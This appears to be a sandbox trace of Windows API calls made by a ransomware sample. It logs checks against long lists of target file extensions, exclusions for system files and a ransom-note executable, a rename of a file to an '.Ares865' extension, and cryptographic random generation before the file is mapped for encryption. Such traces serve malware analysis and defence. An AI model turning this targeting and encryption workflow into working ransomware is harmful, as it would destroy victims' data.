[0092.726] lstrcmpiW (lpString1="get", lpString2="dbs") returned 1 [0092.726] lstrlenW (lpString="dbt") returned 3 [0092.726] lstrcmpiW (lpString1="get", lpString2="dbt") returned 1 [0092.726] lstrlenW (lpString="dbv") returned 3 [0092.726] lstrcmpiW (lpString1="get", lpString2="dbv") returned 1 [0092.726] lstrlenW (lpString="dbx") returned 3 [0092.726] lstrcmpiW (lpString1="get", lpString2="dbx") returned 1 [0092.726] lstrlenW (lpString="dcb") returned 3 [0092.726] lstrcmpiW (lpString1="get", lpString2="dcb") returned 1 [0092.727] lstrlenW (lpString="dct") returned 3 [0092.727] lstrcmpiW (lpString1="get", lpString2="dct") returned 1 [0092.727] lstrlenW (lpString="dcx") returned 3 [0092.727] lstrcmpiW (lpString1="get", lpString2="dcx") returned 1 [0092.727] lstrlenW (lpString="ddl") returned 3 [0092.727] lstrcmpiW (lpString1="get", lpString2="ddl") returned 1 [0092.727] lstrlenW (lpString="dlis") returned 4 [0092.727] lstrcmpiW (lpString1="rget", lpString2="dlis") returned 1 [0092.727] lstrlenW (lpString="dp1") returned 3 [0092.727] lstrcmpiW (lpString1="get", lpString2="dp1") returned 1 [0092.727] lstrlenW (lpString="dqy") returned 3 [0092.727] lstrcmpiW (lpString1="get", lpString2="dqy") returned 1 [0092.727] lstrlenW (lpString="dsk") returned 3 [0092.727] lstrcmpiW (lpString1="get", lpString2="dsk") returned 1 [0092.727] lstrlenW (lpString="dsn") returned 3 [0092.727] lstrcmpiW (lpString1="get", lpString2="dsn") returned 1 [0092.727] lstrlenW (lpString="dtsx") returned 4 [0092.727] lstrcmpiW (lpString1="rget", lpString2="dtsx") returned 1 [0092.727] lstrlenW (lpString="dxl") returned 3 [0092.727] lstrcmpiW (lpString1="get", lpString2="dxl") returned 1 [0092.727] lstrlenW (lpString="eco") returned 3 [0092.727] lstrcmpiW (lpString1="get", lpString2="eco") returned 1 [0092.727] lstrlenW (lpString="ecx") returned 3 [0092.727] lstrcmpiW (lpString1="get", lpString2="ecx") returned 1 [0092.727] lstrlenW (lpString="edb") returned 3 [0092.727] lstrcmpiW (lpString1="get", lpString2="edb") returned 1 [0092.727] lstrlenW (lpString="epim") returned 4 [0092.727] lstrcmpiW (lpString1="rget", lpString2="epim") returned 1 [0092.727] lstrlenW (lpString="fcd") returned 3 [0092.727] lstrcmpiW (lpString1="get", lpString2="fcd") returned 1 [0092.727] lstrlenW (lpString="fdb") returned 3 [0092.727] lstrcmpiW (lpString1="get", lpString2="fdb") returned 1 [0092.727] lstrlenW (lpString="fic") returned 3 [0092.727] lstrcmpiW (lpString1="get", lpString2="fic") returned 1 [0092.727] lstrlenW (lpString="flexolibrary") returned 12 [0092.727] lstrcmpiW (lpString1="SendToTarget", lpString2="flexolibrary") returned 1 [0092.727] lstrlenW (lpString="fm5") returned 3 [0092.727] lstrcmpiW (lpString1="get", lpString2="fm5") returned 1 [0092.728] lstrlenW (lpString="fmp") returned 3 [0092.728] lstrcmpiW (lpString1="get", lpString2="fmp") returned 1 [0092.728] lstrlenW (lpString="fmp12") returned 5 [0092.728] lstrcmpiW (lpString1="arget", lpString2="fmp12") returned -1 [0092.728] lstrlenW (lpString="fmpsl") returned 5 [0092.728] lstrcmpiW (lpString1="arget", lpString2="fmpsl") returned -1 [0092.728] lstrlenW (lpString="fol") returned 3 [0092.728] lstrcmpiW (lpString1="get", lpString2="fol") returned 1 [0092.728] lstrlenW (lpString="fp3") returned 3 [0092.728] lstrcmpiW (lpString1="get", lpString2="fp3") returned 1 [0092.728] lstrlenW (lpString="fp4") returned 3 [0092.728] lstrcmpiW (lpString1="get", lpString2="fp4") returned 1 [0092.728] lstrlenW (lpString="fp5") returned 3 [0092.728] lstrcmpiW (lpString1="get", lpString2="fp5") returned 1 [0092.728] lstrlenW (lpString="fp7") returned 3 [0092.728] lstrcmpiW (lpString1="get", lpString2="fp7") returned 1 [0092.728] lstrlenW (lpString="fpt") returned 3 [0092.728] lstrcmpiW (lpString1="get", lpString2="fpt") returned 1 [0092.728] lstrlenW (lpString="frm") returned 3 [0092.728] lstrcmpiW (lpString1="get", lpString2="frm") returned 1 [0092.728] lstrlenW (lpString="gdb") returned 3 [0092.728] lstrcmpiW (lpString1="get", lpString2="gdb") returned 1 [0092.728] lstrlenW (lpString="gdb") returned 3 [0092.728] lstrcmpiW (lpString1="get", lpString2="gdb") returned 1 [0092.728] lstrlenW (lpString="grdb") returned 4 [0092.728] lstrcmpiW (lpString1="rget", lpString2="grdb") returned 1 [0092.728] lstrlenW (lpString="gwi") returned 3 [0092.728] lstrcmpiW (lpString1="get", lpString2="gwi") returned -1 [0092.728] lstrlenW (lpString="hdb") returned 3 [0092.728] lstrcmpiW (lpString1="get", lpString2="hdb") returned -1 [0092.728] lstrlenW (lpString="his") returned 3 [0092.728] lstrcmpiW (lpString1="get", lpString2="his") returned -1 [0092.728] lstrlenW (lpString="ib") returned 2 [0092.728] lstrcmpiW (lpString1="et", lpString2="ib") returned -1 [0092.728] lstrlenW (lpString="idb") returned 3 [0092.728] lstrcmpiW (lpString1="get", lpString2="idb") returned -1 [0092.728] lstrlenW (lpString="ihx") returned 3 [0092.728] lstrcmpiW (lpString1="get", lpString2="ihx") returned -1 [0092.729] lstrlenW (lpString="itdb") returned 4 [0092.729] lstrcmpiW (lpString1="rget", lpString2="itdb") returned 1 [0092.729] lstrlenW (lpString="itw") returned 3 [0092.729] lstrcmpiW (lpString1="get", lpString2="itw") returned -1 [0092.729] lstrlenW (lpString="jet") returned 3 [0092.729] lstrcmpiW (lpString1="get", lpString2="jet") returned -1 [0092.729] lstrlenW (lpString="jtx") returned 3 [0092.729] lstrcmpiW (lpString1="get", lpString2="jtx") returned -1 [0092.729] lstrlenW (lpString="kdb") returned 3 [0092.729] lstrcmpiW (lpString1="get", lpString2="kdb") returned -1 [0092.729] lstrlenW (lpString="kexi") returned 4 [0092.729] lstrcmpiW (lpString1="rget", lpString2="kexi") returned 1 [0092.729] lstrlenW (lpString="kexic") returned 5 [0092.729] lstrcmpiW (lpString1="arget", lpString2="kexic") returned -1 [0092.729] lstrlenW (lpString="kexis") returned 5 [0092.729] lstrcmpiW (lpString1="arget", lpString2="kexis") returned -1 [0092.729] lstrlenW (lpString="lgc") returned 3 [0092.729] lstrcmpiW (lpString1="get", lpString2="lgc") returned -1 [0092.729] lstrlenW (lpString="lwx") returned 3 [0092.729] lstrcmpiW (lpString1="get", lpString2="lwx") returned -1 [0092.729] lstrlenW (lpString="maf") returned 3 [0092.729] lstrcmpiW (lpString1="get", lpString2="maf") returned -1 [0092.729] lstrlenW (lpString="maq") returned 3 [0092.729] lstrcmpiW (lpString1="get", lpString2="maq") returned -1 [0092.729] lstrlenW (lpString="mar") returned 3 [0092.729] lstrcmpiW (lpString1="get", lpString2="mar") returned -1 [0092.729] lstrlenW (lpString="marshal") returned 7 [0092.729] lstrcmpiW (lpString1="oTarget", lpString2="marshal") returned 1 [0092.729] lstrlenW (lpString="mas") returned 3 [0092.729] lstrcmpiW (lpString1="get", lpString2="mas") returned -1 [0092.729] lstrlenW (lpString="mav") returned 3 [0092.729] lstrcmpiW (lpString1="get", lpString2="mav") returned -1 [0092.729] lstrlenW (lpString="maw") returned 3 [0092.729] lstrcmpiW (lpString1="get", lpString2="maw") returned -1 [0092.729] lstrlenW (lpString="mdbhtml") returned 7 [0092.729] lstrcmpiW (lpString1="oTarget", lpString2="mdbhtml") returned 1 [0092.729] lstrlenW (lpString="mdn") returned 3 [0092.729] lstrcmpiW (lpString1="get", lpString2="mdn") returned -1 [0092.730] lstrlenW (lpString="mdt") returned 3 [0092.730] lstrcmpiW (lpString1="get", lpString2="mdt") returned -1 [0092.730] lstrlenW (lpString="mfd") returned 3 [0092.730] lstrcmpiW (lpString1="get", lpString2="mfd") returned -1 [0092.730] lstrlenW (lpString="mpd") returned 3 [0092.730] lstrcmpiW (lpString1="get", lpString2="mpd") returned -1 [0092.730] lstrlenW (lpString="mrg") returned 3 [0092.730] lstrcmpiW (lpString1="get", lpString2="mrg") returned -1 [0092.730] lstrlenW (lpString="mud") returned 3 [0092.730] lstrcmpiW (lpString1="get", lpString2="mud") returned -1 [0092.730] lstrlenW (lpString="mwb") returned 3 [0092.730] lstrcmpiW (lpString1="get", lpString2="mwb") returned -1 [0092.730] lstrlenW (lpString="myd") returned 3 [0092.730] lstrcmpiW (lpString1="get", lpString2="myd") returned -1 [0092.730] lstrlenW (lpString="ndf") returned 3 [0092.730] lstrcmpiW (lpString1="get", lpString2="ndf") returned -1 [0092.730] lstrlenW (lpString="nnt") returned 3 [0092.730] lstrcmpiW (lpString1="get", lpString2="nnt") returned -1 [0092.730] lstrlenW (lpString="nrmlib") returned 6 [0092.730] lstrcmpiW (lpString1="Target", lpString2="nrmlib") returned 1 [0092.730] lstrlenW (lpString="ns2") returned 3 [0092.730] lstrcmpiW (lpString1="get", lpString2="ns2") returned -1 [0092.730] lstrlenW (lpString="ns3") returned 3 [0092.730] lstrcmpiW (lpString1="get", lpString2="ns3") returned -1 [0092.730] lstrlenW (lpString="ns4") returned 3 [0092.730] lstrcmpiW (lpString1="get", lpString2="ns4") returned -1 [0092.730] lstrlenW (lpString="nsf") returned 3 [0092.730] lstrcmpiW (lpString1="get", lpString2="nsf") returned -1 [0092.730] lstrlenW (lpString="nv") returned 2 [0092.730] lstrcmpiW (lpString1="et", lpString2="nv") returned -1 [0092.730] lstrlenW (lpString="nv2") returned 3 [0092.730] lstrcmpiW (lpString1="get", lpString2="nv2") returned -1 [0092.730] lstrlenW (lpString="nwdb") returned 4 [0092.730] lstrcmpiW (lpString1="rget", lpString2="nwdb") returned 1 [0092.730] lstrlenW (lpString="nyf") returned 3 [0092.730] lstrcmpiW (lpString1="get", lpString2="nyf") returned -1 [0092.730] lstrlenW (lpString="odb") returned 3 [0092.731] lstrcmpiW (lpString1="get", lpString2="odb") returned -1 [0092.731] lstrlenW (lpString="odb") returned 3 [0092.731] lstrcmpiW (lpString1="get", lpString2="odb") returned -1 [0092.731] lstrlenW (lpString="oqy") returned 3 [0092.731] lstrcmpiW (lpString1="get", lpString2="oqy") returned -1 [0092.731] lstrlenW (lpString="ora") returned 3 [0092.731] lstrcmpiW (lpString1="get", lpString2="ora") returned -1 [0092.731] lstrlenW (lpString="orx") returned 3 [0092.731] lstrcmpiW (lpString1="get", lpString2="orx") returned -1 [0092.731] lstrlenW (lpString="owc") returned 3 [0092.731] lstrcmpiW (lpString1="get", lpString2="owc") returned -1 [0092.731] lstrlenW (lpString="p96") returned 3 [0092.731] lstrcmpiW (lpString1="get", lpString2="p96") returned -1 [0092.731] lstrlenW (lpString="p97") returned 3 [0092.731] lstrcmpiW (lpString1="get", lpString2="p97") returned -1 [0092.731] lstrlenW (lpString="pan") returned 3 [0092.731] lstrcmpiW (lpString1="get", lpString2="pan") returned -1 [0092.731] lstrlenW (lpString="pdb") returned 3 [0092.731] lstrcmpiW (lpString1="get", lpString2="pdb") returned -1 [0092.731] lstrlenW (lpString="pdm") returned 3 [0092.731] lstrcmpiW (lpString1="get", lpString2="pdm") returned -1 [0092.731] lstrlenW (lpString="pnz") returned 3 [0092.731] lstrcmpiW (lpString1="get", lpString2="pnz") returned -1 [0092.731] lstrlenW (lpString="qry") returned 3 [0092.731] lstrcmpiW (lpString1="get", lpString2="qry") returned -1 [0092.731] lstrlenW (lpString="qvd") returned 3 [0092.731] lstrcmpiW (lpString1="get", lpString2="qvd") returned -1 [0092.731] lstrlenW (lpString="rbf") returned 3 [0092.731] lstrcmpiW (lpString1="get", lpString2="rbf") returned -1 [0092.731] lstrlenW (lpString="rctd") returned 4 [0092.731] lstrcmpiW (lpString1="rget", lpString2="rctd") returned 1 [0092.731] lstrlenW (lpString="rod") returned 3 [0092.731] lstrcmpiW (lpString1="get", lpString2="rod") returned -1 [0092.731] lstrlenW (lpString="rodx") returned 4 [0092.731] lstrcmpiW (lpString1="rget", lpString2="rodx") returned -1 [0092.731] lstrlenW (lpString="rpd") returned 3 [0092.731] lstrcmpiW (lpString1="get", lpString2="rpd") returned -1 [0092.732] lstrlenW (lpString="rsd") returned 3 [0092.732] lstrcmpiW (lpString1="get", lpString2="rsd") returned -1 [0092.732] lstrlenW (lpString="sas7bdat") returned 8 [0092.732] lstrcmpiW (lpString1="ToTarget", lpString2="sas7bdat") returned 1 [0092.732] lstrlenW (lpString="sbf") returned 3 [0092.732] lstrcmpiW (lpString1="get", lpString2="sbf") returned -1 [0092.732] lstrlenW (lpString="scx") returned 3 [0092.732] lstrcmpiW (lpString1="get", lpString2="scx") returned -1 [0092.732] lstrlenW (lpString="sdb") returned 3 [0092.732] lstrcmpiW (lpString1="get", lpString2="sdb") returned -1 [0092.732] lstrlenW (lpString="sdc") returned 3 [0092.732] lstrcmpiW (lpString1="get", lpString2="sdc") returned -1 [0092.732] lstrlenW (lpString="sdf") returned 3 [0092.732] lstrcmpiW (lpString1="get", lpString2="sdf") returned -1 [0092.732] lstrlenW (lpString="sis") returned 3 [0092.732] lstrcmpiW (lpString1="get", lpString2="sis") returned -1 [0092.732] lstrlenW (lpString="spq") returned 3 [0092.732] lstrcmpiW (lpString1="get", lpString2="spq") returned -1 [0092.732] lstrlenW (lpString="te") returned 2 [0092.732] lstrcmpiW (lpString1="et", lpString2="te") returned -1 [0092.732] lstrlenW (lpString="teacher") returned 7 [0092.732] lstrcmpiW (lpString1="oTarget", lpString2="teacher") returned -1 [0092.732] lstrlenW (lpString="tmd") returned 3 [0092.732] lstrcmpiW (lpString1="get", lpString2="tmd") returned -1 [0092.732] lstrlenW (lpString="tps") returned 3 [0092.732] lstrcmpiW (lpString1="get", lpString2="tps") returned -1 [0092.732] lstrlenW (lpString="trc") returned 3 [0092.732] lstrcmpiW (lpString1="get", lpString2="trc") returned -1 [0092.732] lstrlenW (lpString="trc") returned 3 [0092.732] lstrcmpiW (lpString1="get", lpString2="trc") returned -1 [0092.732] lstrlenW (lpString="trm") returned 3 [0092.732] lstrcmpiW (lpString1="get", lpString2="trm") returned -1 [0092.732] lstrlenW (lpString="udb") returned 3 [0092.732] lstrcmpiW (lpString1="get", lpString2="udb") returned -1 [0092.732] lstrlenW (lpString="udl") returned 3 [0092.732] lstrcmpiW (lpString1="get", lpString2="udl") returned -1 [0092.732] lstrlenW (lpString="usr") returned 3 [0092.733] lstrcmpiW (lpString1="get", lpString2="usr") returned -1 [0092.733] lstrlenW (lpString="v12") returned 3 [0092.733] lstrcmpiW (lpString1="get", lpString2="v12") returned -1 [0092.733] lstrlenW (lpString="vis") returned 3 [0092.733] lstrcmpiW (lpString1="get", lpString2="vis") returned -1 [0092.733] lstrlenW (lpString="vpd") returned 3 [0092.733] lstrcmpiW (lpString1="get", lpString2="vpd") returned -1 [0092.733] lstrlenW (lpString="vvv") returned 3 [0092.733] lstrcmpiW (lpString1="get", lpString2="vvv") returned -1 [0092.733] lstrlenW (lpString="wdb") returned 3 [0092.733] lstrcmpiW (lpString1="get", lpString2="wdb") returned -1 [0092.733] lstrlenW (lpString="wmdb") returned 4 [0092.733] lstrcmpiW (lpString1="rget", lpString2="wmdb") returned -1 [0092.733] lstrlenW (lpString="wrk") returned 3 [0092.733] lstrcmpiW (lpString1="get", lpString2="wrk") returned -1 [0092.733] lstrlenW (lpString="xdb") returned 3 [0092.733] lstrcmpiW (lpString1="get", lpString2="xdb") returned -1 [0092.733] lstrlenW (lpString="xld") returned 3 [0092.733] lstrcmpiW (lpString1="get", lpString2="xld") returned -1 [0092.733] lstrlenW (lpString="xmlff") returned 5 [0092.733] lstrcmpiW (lpString1="arget", lpString2="xmlff") returned -1 [0092.733] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\Compressed (zipped) Folder.ZFSendToTarget.Ares865") returned 86 [0092.733] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\Compressed (zipped) Folder.ZFSendToTarget" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\sendto\\compressed (zipped) folder.zfsendtotarget"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\Compressed (zipped) Folder.ZFSendToTarget.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\sendto\\compressed (zipped) folder.zfsendtotarget.ares865"), dwFlags=0x1) returned 1 [0092.734] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\Compressed (zipped) Folder.ZFSendToTarget.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\sendto\\compressed (zipped) folder.zfsendtotarget.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0092.734] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3) returned 1 [0092.734] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0092.734] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0092.734] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0092.735] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0092.735] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0092.735] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0092.736] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x310, lpName=0x0) returned 0x15c [0092.739] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x310) returned 0x190000 [0092.740] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0092.740] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0092.740] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0092.740] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0092.740] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0092.740] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0092.741] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0092.741] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0092.741] lstrcmpiW (lpString1="Desktop (create shortcut).DeskLink", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0092.741] lstrcmpiW (lpString1="Desktop (create shortcut).DeskLink", lpString2="aoldtz.exe") returned 1 [0092.741] lstrcmpiW (lpString1="Desktop (create shortcut).DeskLink", lpString2=".") returned 1 [0092.742] lstrcmpiW (lpString1="Desktop (create shortcut).DeskLink", lpString2="..") returned 1 [0092.743] lstrcmpiW (lpString1="Desktop (create shortcut).DeskLink", lpString2="windows") returned -1 [0092.743] lstrcmpiW (lpString1="Desktop (create shortcut).DeskLink", lpString2="bootmgr") returned 1 [0092.743] lstrcmpiW (lpString1="Desktop (create shortcut).DeskLink", lpString2="temp") returned -1 [0092.743] lstrcmpiW (lpString1="Desktop (create shortcut).DeskLink", lpString2="pagefile.sys") returned -1 [0092.743] lstrcmpiW (lpString1="Desktop (create shortcut).DeskLink", lpString2="boot") returned 1 [0092.743] lstrcmpiW (lpString1="Desktop (create shortcut).DeskLink", lpString2="ids.txt") returned -1 [0092.743] lstrcmpiW (lpString1="Desktop (create shortcut).DeskLink", lpString2="ntuser.dat") returned -1 [0092.743] lstrcmpiW (lpString1="Desktop (create shortcut).DeskLink", lpString2="perflogs") returned -1 [0092.743] lstrcmpiW (lpString1="Desktop (create shortcut).DeskLink", lpString2="MSBuild") returned -1 [0092.743] lstrlenW (lpString="Desktop (create shortcut).DeskLink") returned 34 [0092.743] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\Compressed (zipped) Folder.ZFSendToTarget") returned 78 [0092.743] lstrcpyW (in: lpString1=0x2cce44a, lpString2="Desktop (create shortcut).DeskLink" | out: lpString1="Desktop (create shortcut).DeskLink") returned="Desktop (create shortcut).DeskLink" [0092.743] lstrlenW (lpString="Desktop (create shortcut).DeskLink") returned 34 [0092.743] lstrlenW (lpString="Ares865") returned 7 [0092.743] lstrcmpiW (lpString1="eskLink", lpString2="Ares865") returned 1 [0092.743] lstrlenW (lpString=".dll") returned 4 [0092.743] lstrcmpiW (lpString1="Desktop (create shortcut).DeskLink", lpString2=".dll") returned 1 [0092.743] lstrlenW (lpString=".lnk") returned 4 [0092.743] lstrcmpiW (lpString1="Desktop (create shortcut).DeskLink", lpString2=".lnk") returned 1 [0092.743] lstrlenW (lpString=".ini") returned 4 [0092.743] lstrcmpiW (lpString1="Desktop (create shortcut).DeskLink", lpString2=".ini") returned 1 [0092.743] lstrlenW (lpString=".sys") returned 4 [0092.743] lstrcmpiW (lpString1="Desktop (create shortcut).DeskLink", lpString2=".sys") returned 1 [0092.743] lstrlenW (lpString="Desktop (create shortcut).DeskLink") returned 34 [0092.743] lstrlenW (lpString="bak") returned 3 [0092.743] lstrcmpiW (lpString1="ink", lpString2="bak") returned 1 [0092.743] lstrlenW (lpString="ba_") returned 3 [0092.743] lstrcmpiW (lpString1="ink", lpString2="ba_") returned 1 [0092.743] lstrlenW (lpString="dbb") returned 3 [0092.743] lstrcmpiW (lpString1="ink", lpString2="dbb") returned 1 [0092.743] lstrlenW (lpString="vmdk") returned 4 [0092.743] lstrcmpiW (lpString1="Link", lpString2="vmdk") returned -1 [0092.743] lstrlenW (lpString="rar") returned 3 [0092.743] lstrcmpiW (lpString1="ink", lpString2="rar") returned -1 [0092.743] lstrlenW (lpString="zip") returned 3 [0092.743] lstrcmpiW (lpString1="ink", lpString2="zip") returned -1 [0092.744] lstrlenW (lpString="tgz") returned 3 [0092.744] lstrcmpiW (lpString1="ink", lpString2="tgz") returned -1 [0092.744] lstrlenW (lpString="vbox") returned 4 [0092.744] lstrcmpiW (lpString1="Link", lpString2="vbox") returned -1 [0092.744] lstrlenW (lpString="vdi") returned 3 [0092.744] lstrcmpiW (lpString1="ink", lpString2="vdi") returned -1 [0092.744] lstrlenW (lpString="vhd") returned 3 [0092.744] lstrcmpiW (lpString1="ink", lpString2="vhd") returned -1 [0092.744] lstrlenW (lpString="vhdx") returned 4 [0092.744] lstrcmpiW (lpString1="Link", lpString2="vhdx") returned -1 [0092.744] lstrlenW (lpString="avhd") returned 4 [0092.744] lstrcmpiW (lpString1="Link", lpString2="avhd") returned 1 [0092.744] lstrlenW (lpString="db") returned 2 [0092.744] lstrcmpiW (lpString1="nk", lpString2="db") returned 1 [0092.744] lstrlenW (lpString="db2") returned 3 [0092.744] lstrcmpiW (lpString1="ink", lpString2="db2") returned 1 [0092.744] lstrlenW (lpString="db3") returned 3 [0092.744] lstrcmpiW (lpString1="ink", lpString2="db3") returned 1 [0092.744] lstrlenW (lpString="dbf") returned 3 [0092.744] lstrcmpiW (lpString1="ink", lpString2="dbf") returned 1 [0092.744] lstrlenW (lpString="mdf") returned 3 [0092.744] lstrcmpiW (lpString1="ink", lpString2="mdf") returned -1 [0092.744] lstrlenW (lpString="mdb") returned 3 [0092.744] lstrcmpiW (lpString1="ink", lpString2="mdb") returned -1 [0092.744] lstrlenW (lpString="sql") returned 3 [0092.744] lstrcmpiW (lpString1="ink", lpString2="sql") returned -1 [0092.744] lstrlenW (lpString="sqlite") returned 6 [0092.744] lstrcmpiW (lpString1="skLink", lpString2="sqlite") returned -1 [0092.744] lstrlenW (lpString="sqlite3") returned 7 [0092.744] lstrcmpiW (lpString1="eskLink", lpString2="sqlite3") returned -1 [0092.744] lstrlenW (lpString="sqlitedb") returned 8 [0092.744] lstrcmpiW (lpString1="DeskLink", lpString2="sqlitedb") returned -1 [0092.744] lstrlenW (lpString="xml") returned 3 [0092.744] lstrcmpiW (lpString1="ink", lpString2="xml") returned -1 [0092.744] lstrlenW (lpString="$er") returned 3 [0092.744] lstrcmpiW (lpString1="ink", lpString2="$er") returned 1 [0092.744] lstrlenW (lpString="4dd") returned 3 [0092.745] lstrcmpiW (lpString1="ink", lpString2="4dd") returned 1 [0092.745] lstrlenW (lpString="4dl") returned 3 [0092.745] lstrcmpiW (lpString1="ink", lpString2="4dl") returned 1 [0092.745] lstrlenW (lpString="^^^") returned 3 [0092.745] lstrcmpiW (lpString1="ink", lpString2="^^^") returned 1 [0092.745] lstrlenW (lpString="abs") returned 3 [0092.745] lstrcmpiW (lpString1="ink", lpString2="abs") returned 1 [0092.745] lstrlenW (lpString="abx") returned 3 [0092.745] lstrcmpiW (lpString1="ink", lpString2="abx") returned 1 [0092.745] lstrlenW (lpString="accdb") returned 5 [0092.745] lstrcmpiW (lpString1="kLink", lpString2="accdb") returned 1 [0092.745] lstrlenW (lpString="accdc") returned 5 [0092.745] lstrcmpiW (lpString1="kLink", lpString2="accdc") returned 1 [0092.745] lstrlenW (lpString="accde") returned 5 [0092.745] lstrcmpiW (lpString1="kLink", lpString2="accde") returned 1 [0092.745] lstrlenW (lpString="accdr") returned 5 [0092.745] lstrcmpiW (lpString1="kLink", lpString2="accdr") returned 1 [0092.745] lstrlenW (lpString="accdt") returned 5 [0092.745] lstrcmpiW (lpString1="kLink", lpString2="accdt") returned 1 [0092.745] lstrlenW (lpString="accdw") returned 5 [0092.745] lstrcmpiW (lpString1="kLink", lpString2="accdw") returned 1 [0092.745] lstrlenW (lpString="accft") returned 5 [0092.745] lstrcmpiW (lpString1="kLink", lpString2="accft") returned 1 [0092.745] lstrlenW (lpString="adb") returned 3 [0092.745] lstrcmpiW (lpString1="ink", lpString2="adb") returned 1 [0092.745] lstrlenW (lpString="adb") returned 3 [0092.745] lstrcmpiW (lpString1="ink", lpString2="adb") returned 1 [0092.745] lstrlenW (lpString="ade") returned 3 [0092.745] lstrcmpiW (lpString1="ink", lpString2="ade") returned 1 [0092.745] lstrlenW (lpString="adf") returned 3 [0092.745] lstrcmpiW (lpString1="ink", lpString2="adf") returned 1 [0092.745] lstrlenW (lpString="adn") returned 3 [0092.745] lstrcmpiW (lpString1="ink", lpString2="adn") returned 1 [0092.745] lstrlenW (lpString="adp") returned 3 [0092.745] lstrcmpiW (lpString1="ink", lpString2="adp") returned 1 [0092.745] lstrlenW (lpString="alf") returned 3 [0092.745] lstrcmpiW (lpString1="ink", lpString2="alf") returned 1 [0092.745] lstrlenW (lpString="ask") returned 3 [0092.745] lstrcmpiW (lpString1="ink", lpString2="ask") returned 1 [0092.746] lstrlenW (lpString="btr") returned 3 [0092.746] lstrcmpiW (lpString1="ink", lpString2="btr") returned 1 [0092.746] lstrlenW (lpString="cat") returned 3 [0092.746] lstrcmpiW (lpString1="ink", lpString2="cat") returned 1 [0092.746] lstrlenW (lpString="cdb") returned 3 [0092.746] lstrcmpiW (lpString1="ink", lpString2="cdb") returned 1 [0092.746] lstrlenW (lpString="ckp") returned 3 [0092.746] lstrcmpiW (lpString1="ink", lpString2="ckp") returned 1 [0092.746] lstrlenW (lpString="cma") returned 3 [0092.746] lstrcmpiW (lpString1="ink", lpString2="cma") returned 1 [0092.746] lstrlenW (lpString="cpd") returned 3 [0092.746] lstrcmpiW (lpString1="ink", lpString2="cpd") returned 1 [0092.746] lstrlenW (lpString="dacpac") returned 6 [0092.746] lstrcmpiW (lpString1="skLink", lpString2="dacpac") returned 1 [0092.746] lstrlenW (lpString="dad") returned 3 [0092.746] lstrcmpiW (lpString1="ink", lpString2="dad") returned 1 [0092.746] lstrlenW (lpString="dadiagrams") returned 10 [0092.746] lstrcmpiW (lpString1=").DeskLink", lpString2="dadiagrams") returned -1 [0092.746] lstrlenW (lpString="daschema") returned 8 [0092.746] lstrcmpiW (lpString1="DeskLink", lpString2="daschema") returned 1 [0092.746] lstrlenW (lpString="db-journal") returned 10 [0092.746] lstrcmpiW (lpString1=").DeskLink", lpString2="db-journal") returned -1 [0092.746] lstrlenW (lpString="db-shm") returned 6 [0092.746] lstrcmpiW (lpString1="skLink", lpString2="db-shm") returned 1 [0092.746] lstrlenW (lpString="db-wal") returned 6 [0092.746] lstrcmpiW (lpString1="skLink", lpString2="db-wal") returned 1 [0092.746] lstrlenW (lpString="dbc") returned 3 [0092.746] lstrcmpiW (lpString1="ink", lpString2="dbc") returned 1 [0092.746] lstrlenW (lpString="dbs") returned 3 [0092.746] lstrcmpiW (lpString1="ink", lpString2="dbs") returned 1 [0092.746] lstrlenW (lpString="dbt") returned 3 [0092.746] lstrcmpiW (lpString1="ink", lpString2="dbt") returned 1 [0092.746] lstrlenW (lpString="dbv") returned 3 [0092.746] lstrcmpiW (lpString1="ink", lpString2="dbv") returned 1 [0092.746] lstrlenW (lpString="dbx") returned 3 [0092.746] lstrcmpiW (lpString1="ink", lpString2="dbx") returned 1 [0092.746] lstrlenW (lpString="dcb") returned 3 [0092.747] 